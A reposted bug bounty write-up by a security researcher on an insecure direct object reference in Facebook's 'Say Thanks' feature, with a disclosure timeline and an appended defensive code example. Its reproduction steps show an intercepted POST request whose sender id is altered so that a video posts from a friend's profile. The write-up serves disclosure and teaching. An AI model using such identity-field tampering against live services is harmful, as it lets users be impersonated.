
Facebook Bug allows to post on behalf of anyone | Writeup by Anand Prakash




Hello guys, today we have a write-up by an Indian security researcher, Anand Prakash, who found a bug on Facebook that allowed him to post on behalf of anyone.

Let me continue this with his own words...


Facebook recently introduced "Say Thanks", an experience that lets Facebook users create personalized video cards for their Facebook friends.

To create a Thanks video, a user needs to visit facebook.com/thanks and choose a friend. A user can select a different theme and edit photos and posts that represent their friendship.

Once you are ready, you have to click on the "Share" button and your video will be shared on your timeline with the friend tagged. It will show up on your timeline as well as the friend's.

So, I started digging as soon as "Say Thanks" was launched.

Below are a few things that I tried:
1) Posting on behalf of a non-Facebook friend.

2) Posting on behalf of a Facebook friend.

Interestingly, posting on behalf of your Facebook friends worked.

After successful exploitation, a video was posted from the victim's profile saying thanks.

Bug type: Insecure direct object reference (OWASP A4)

Steps to reproduce:
1) Go to https://www.facebook.com/thanks
2) Choose any friend from your list. Now, in the top corner, click on the "Share video" option.
3) Now, before posting, make sure Burp Suite's Interceptor is turned on to capture the request.

Now click on "Post Video"; you will see a request like the one below in Burp Suite:

POST /thanks/send/async/ HTTP/1.1
Host: www.facebook.com

fb_dtsg=YYYYYY
&message_text=Hey Anand, I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks
&message=Hey @[1234543:Anand], I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks
&cache_version=24&content=[]&content_count=0
&receiver={"id":1234543,"fbid":1234543,"name":"Anand Prakash","imageURL":"","gender":2,"greeting":"Hey Anand","shortName":"Anand","relationship":-1,"relationshipName":null,"firstName":"Anand","genderType":"MALE","profilePhoto":"","profilePhotoID":8359028035,"profilePhotoBegin":"}
&sender={"id":131232524,"name":"Sangwan Manisha","firstName":"Manisha","genderType":"FEMALE","profilePhoto":"","profilePhotoID":,"profilePhotoBegin":"","profilePhotoBeginID":328985902339}
&timestamp=1417279810172&theme_details={}
&theme_id=DEFAULT_THEME&privacyx=9238943
&__user=1234543__a=1&__dyn=&__req=13&ttstamp=__rev=1512134

4) I changed the sender={id=XXXXX to the victim's Facebook ID (here XXXXX), and in a few seconds the video got posted from the victim's Facebook profile.






Timeline:
==========
Nov 14, 2014 12:41am - Report Sent to Facebook Security team

Nov 14, 2014 2:00am - Initial Reply from Mordecai saying he is not able to reproduce the issue

Nov 14, 2014 8:17am - Confirmation of vulnerability from Neal Poole

Nov 14, 2014 10:42am - Issue fixed by Facebook

Nov 14, 2014 11:44am - Fix verification by me

Nov 19, 2014 10:10am - Bounty of $12,500 awarded by Facebook.
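
The flaw in the writeup comes down to a server treating the client-supplied sender id as the author of the post. The sketch below is an added example, not code from the writeup or from Facebook: it puts that flawed pattern next to a handler that binds the author to the authenticated session. The handler names, user ids and friend table are hypothetical and constructed for illustration.

```python
import json
from urllib.parse import parse_qs, urlencode

# Constructed data: hypothetical user ids and friend lists, not Facebook's.
FRIENDS = {1001: {1002, 1003}, 1002: {1001}, 1003: {1001}}


class Forbidden(Exception):
    """Raised when a request fails an authorization check."""


def parse_body(body):
    """Decode the form body and the JSON objects in receiver/sender."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return json.loads(form["receiver"]), json.loads(form["sender"])


def share_vulnerable(session_user_id, body):
    """Flawed pattern: the author is taken from the client-supplied sender."""
    receiver, sender = parse_body(body)
    return {"author": sender["id"], "tagged": receiver["id"]}


def share_hardened(session_user_id, body):
    """Author comes from the session; client-supplied ids are only checked."""
    receiver, sender = parse_body(body)
    if sender.get("id") != session_user_id:
        # A mismatch means the body was altered in transit: reject and log it.
        raise Forbidden("sender id does not match authenticated user")
    if receiver.get("id") not in FRIENDS.get(session_user_id, set()):
        raise Forbidden("receiver is not a friend of the authenticated user")
    return {"author": session_user_id, "tagged": receiver["id"]}


def make_body(sender_id, receiver_id):
    """Build a constructed request body carrying the two JSON fields."""
    return urlencode({
        "receiver": json.dumps({"id": receiver_id}),
        "sender": json.dumps({"id": sender_id}),
    })
```

Rejected requests with a sender/session mismatch are worth logging, since a legitimate client never produces one.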
